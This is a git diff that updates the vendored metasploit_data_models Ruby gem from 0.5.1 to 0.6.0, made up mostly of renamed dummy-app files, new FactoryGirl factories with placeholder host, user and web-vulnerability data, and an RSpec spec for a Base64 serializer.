lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb
new file mode 100644
index 0000000000..32112b667f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb
@@ -0,0 +1,7 @@
+FactoryGirl.define do
+ sequence :mdm_ipv4_address do |n|
+ max = 255
+
+ "192.168.#{(n / max).to_i}.#{n % max}"
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb
new file mode 100644
index 0000000000..4eaa10e76d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb
@@ -0,0 +1,18 @@
+FactoryGirl.define do
+ factory :mdm_host, :class => Mdm::Host do
+ #
+ # Associations
+ #
+ association :workspace, :factory => :mdm_workspace
+
+ #
+ # Attributes
+ #
+ address { generate :mdm_ipv4_address }
+ name { generate :mdm_host_name }
+ end
+
+ sequence :mdm_host_name do |n|
+ "mdm_host_#{n}"
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb
new file mode 100644
index 0000000000..0c7e02a593
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb
@@ -0,0 +1,35 @@
+FactoryGirl.define do
+ factory :mdm_service, :class => Mdm::Service do
+ #
+ # Associations
+ #
+ association :host, :factory => :mdm_host
+
+ #
+ # Attributes
+ #
+ port 4567
+ proto 'snmp'
+ state 'open'
+
+ factory :web_service do
+ proto 'tcp'
+ name { FactoryGirl.generate(:web_service_name) }
+ port { FactoryGirl.generate(:port) }
+ end
+ end
+
+ port_bits = 16
+ port_limit = 1 << port_bits
+
+ sequence :port do |n|
+ n % port_limit
+ end
+
+ web_service_names = ['http', 'https']
+ web_service_name_count = web_service_names.length
+
+ sequence :web_service_name do |n|
+ web_service_names[n % web_service_name_count]
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb
new file mode 100644
index 0000000000..46179882b3
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb
@@ -0,0 +1,22 @@
+FactoryGirl.define do
+ factory :mdm_user, :class => Mdm::User do
+ admin true
+ company "Interplanetary Teleportation, LTD"
+ email "rwillingham@itl.com"
+ fullname { generate :mdm_user_fullname }
+ phone "5123334444"
+ username { generate :mdm_user_username }
+ end
+
+ factory :non_admin_mdm_user, :parent => :mdm_user do
+ admin false
+ end
+
+ sequence :mdm_user_fullname do |n|
+ "Mdm User Fullname the #{n.ordinalize}"
+ end
+
+ sequence :mdm_user_username do |n|
+ "mdm_user_username#{n}"
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb
new file mode 100644
index 0000000000..071b83c451
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb
@@ -0,0 +1,8 @@
+FactoryGirl.define do
+ factory :mdm_web_site, :class => Mdm::WebSite do
+ #
+ # Associations
+ #
+ association :service, :factory => :mdm_service
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb
new file mode 100644
index 0000000000..4bba254c7b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb
@@ -0,0 +1,64 @@
+FactoryGirl.define do
+ factory :mdm_web_vuln, :class => Mdm::WebVuln do
+ #
+ # Associations
+ #
+ association :web_site, :factory => :mdm_web_site
+
+ #
+ # Attributes
+ #
+
+ category { generate :mdm_web_vuln_category }
+ confidence { generate :mdm_web_vuln_confidence }
+ method { generate :mdm_web_vuln_method }
+ name { generate :mdm_web_vuln_name }
+ path { generate :mdm_web_vuln_path }
+ params { generate :mdm_web_vuln_params }
+ pname { params.first.first }
+ proof { generate :mdm_web_vuln_proof }
+ risk { generate :mdm_web_vuln_risk }
+ end
+
+ sequence :mdm_web_vuln_category do |n|
+ "mdm_web_vuln_category_#{n}"
+ end
+
+ sequence :mdm_web_vuln_confidence do |n|
+ # range is from 1 to 100 so do mod 99 (0 - 99 range) and add 1 to get correct range
+ (n % 99) + 1
+ end
+
+ method_count = Mdm::WebVuln::METHODS.length
+
+ sequence :mdm_web_vuln_method do |n|
+ Mdm::WebVuln::METHODS[n % method_count]
+ end
+
+ sequence :mdm_web_vuln_name do |n|
+ "Web Vulnerability #{n}"
+ end
+
+ sequence :mdm_web_vuln_path do |n|
+ "path/to/vulnerability/#{n}"
+ end
+
+ sequence :mdm_web_vuln_params do |n|
+ [
+ [
+ "param#{n}",
+ "value#{n}"
+ ]
+ ]
+ end
+
+ sequence :mdm_web_vuln_proof do |n|
+ "Mdm::WebVuln Proof #{n}"
+ end
+
+ sequence :mdm_web_vuln_risk do |n|
+ # range is 0 .. 5
+ n % 6
+
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb
new file mode 100644
index 0000000000..38ffbc9077
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb
@@ -0,0 +1,23 @@
+FactoryGirl.define do
+ factory :mdm_workspace, :class => Mdm::Workspace do
+ #
+ # Associations
+ #
+ association :owner, :factory => :mdm_user
+
+ #
+ # Attributes
+ #
+ boundary { generate :mdm_ipv4_address }
+ description { generate :mdm_workspace_description }
+ name { generate :mdm_workspace_name }
+ end
+
+ sequence :mdm_workspace_description do |n|
+ "Mdm::Workspace description #{n}"
+ end
+
+ sequence :mdm_workspace_name do |n|
+ "Mdm::Workspace Name #{n}"
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb
new file mode 100755
index 0000000000..89e48a684b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb
@@ -0,0 +1,174 @@ +require "spec_helper" + +describe MetasploitDataModels::Base64Serializer do + let(:base64_marshaled) do + marshaled = Marshal.dump(unserialized) + + [ + marshaled + ].pack('m') + end + + let(:default) do + {} + end + + let(:unserialized) do + { + :foo => 'bar', + :baz => 'baz' + } + end + + let(:yaml) do + unserialized.to_yaml + end + + subject(:base64_serializer) do + described_class.new + end + + context 'CONSTANTS' do + it 'should define DEFAULT' do + described_class::DEFAULT.should == default + end + + context 'LOADERS' do + it 'should prefer base64 marshaled first' do + first = described_class::LOADERS[0] + deserialized = first.call(base64_marshaled) + + deserialized.should == unserialized + end + + it 'should fallback to the old YAML format second' do + second = described_class::LOADERS[1] + deserialized = second.call(yaml) + + deserialized.should == unserialized + end + + it 'should finally give up and just return the value' do + last = described_class::LOADERS.last + deserialized = last.call(unserialized) + + deserialized.should == unserialized + end + end + end + + context '#default' do + it 'should default to {}' do + base64_serializer.default.should == {} + end + + it 'should return a duplicate' do + duplicate = base64_serializer.default + value = mock('Value') + duplicate[:key] = value + + duplicate.should_not == base64_serializer.default + end + end + + context '#dump' do + it 'should output Base64 encoded marshaled data' do + dumped = base64_serializer.dump(unserialized) + + dumped.should == base64_marshaled + end + end + + context '#initialize' do + let(:attributes) do + {} + end + + subject(:base64_serializer) do + described_class.new(attributes) + end + + context 'with :default' do + let(:attributes) do + { + :default => default + } + end + + let(:default) do + [ + [ + 'param', + 'value' + ] + ] + end + + it 'should have :default in attributes' do + attributes.should have_key(:default) + end + + it 'should set default to :default 
value' do + base64_serializer.default.should == attributes[:default] + end + end + + context 'without :default' do + it 'should not have :default in attributes' do + attributes.should_not have_key(:default) + end + + it 'should default #default to DEFAULT' do + base64_serializer.default.should == default + end + end + end + + context '#load' do + context 'with nil' do + let(:serialized) do + nil + end + + it 'should return #default' do + default = mock('Default') + base64_serializer.stub(:default => default) + deserialized = base64_serializer.load(serialized) + + deserialized.should == default + end + end + + context 'with Base64 encoded marshaled' do + it 'should return unserialized' do + deserialized = base64_serializer.load(base64_marshaled) + + deserialized.should == unserialized + end + + end + + context 'with YAML' do + it 'should return unserialized' do + deserialized = base64_serializer.load(yaml) + + deserialized.should == unserialized + end + end + + context 'without Base64 encoded marshaled' do + context 'without YAML' do + let(:raw_value) do + "< a > b >" + end + + it 'should return raw value' do + deserialized = base64_serializer.load(raw_value) + + deserialized.should == raw_value + end + end + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb similarity index 66% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb index 32b4bef890..a619986a96 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb 
@@ -2,6 +2,8 @@ ENV['RAILS_ENV'] = 'test' require File.expand_path('../dummy/config/environment.rb', __FILE__) +require 'rspec/rails' +require 'rspec/autorun' require 'rubygems' require 'bundler' @@ -22,5 +24,12 @@ Dir.glob(support_glob) do |path| end RSpec.configure do |config| + config.before(:each) do + # Rex is only available when testing with metasploit-framework or pro, so stub out the methods that require it + Mdm::Workspace.any_instance.stub(:valid_ip_or_range? => true) + end + config.mock_with :rspec + config.use_transactional_fixtures = true + config.order = :random end diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec similarity index 97% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec index a88f2d9cd0..4a19d34025 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.5.1" + s.version = "0.6.0" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2013-03-01" + s.date = "2013-03-06" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"]